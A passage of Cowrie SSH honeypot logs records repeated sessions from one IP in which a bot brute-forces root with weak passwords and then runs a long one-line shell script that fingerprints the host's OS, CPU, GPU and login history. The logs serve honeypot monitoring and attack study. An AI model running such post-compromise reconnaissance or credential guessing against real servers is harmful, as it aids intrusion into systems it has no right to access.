{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.215619Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.520149Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.521077Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:31:19.523294Z","src_ip":"212.227.235.229","session":"61fbb593a074"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43274,"dst_ip":"1.2.3.4","dst_port":22,"session":"64ebc7b68c57","protocol":"ssh","message":"New connection: 212.227.235.229:43274 (1.2.3.4:22) [session: 64ebc7b68c57]","sensor":"my-vps","timestamp":"2025-09-08T19:32:38.615721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:32:38.631990Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:32:38.949193Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.127377Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:32:40.707954Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.708629Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.709118Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.710077Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.711082Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.711899Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.712644Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.713648Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.714039Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.714473Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.714822Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.715203Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.715526Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.997969Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:32:40.998994Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:32:41.000381Z","src_ip":"212.227.235.229","session":"64ebc7b68c57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48702,"dst_ip":"1.2.3.4","dst_port":22,"session":"be3cf71b8b12","protocol":"ssh","message":"New connection: 212.227.235.229:48702 (1.2.3.4:22) [session: be3cf71b8b12]","sensor":"my-vps","timestamp":"2025-09-08T19:34:02.115116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:34:02.128717Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:34:02.389410Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.login.success","username":"root","password":"Root123","message":"login attempt [root/Root123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:34:03.634224Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:34:04.259415Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.260150Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.260809Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.262035Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.263611Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.264395Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.265433Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.266792Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.267362Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.267998Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.268503Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.269270Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.269876Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.545511Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.547573Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:34:04.548561Z","src_ip":"212.227.235.229","session":"be3cf71b8b12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35778,"dst_ip":"1.2.3.4","dst_port":22,"session":"09114b37e637","protocol":"ssh","message":"New connection: 212.227.235.229:35778 (1.2.3.4:22) [session: 09114b37e637]","sensor":"my-vps","timestamp":"2025-09-08T19:35:21.599603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:35:21.600550Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:35:21.876944Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.login.success","username":"root","password":"!root","message":"login attempt [root/!root] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:35:22.771995Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:35:23.368359Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 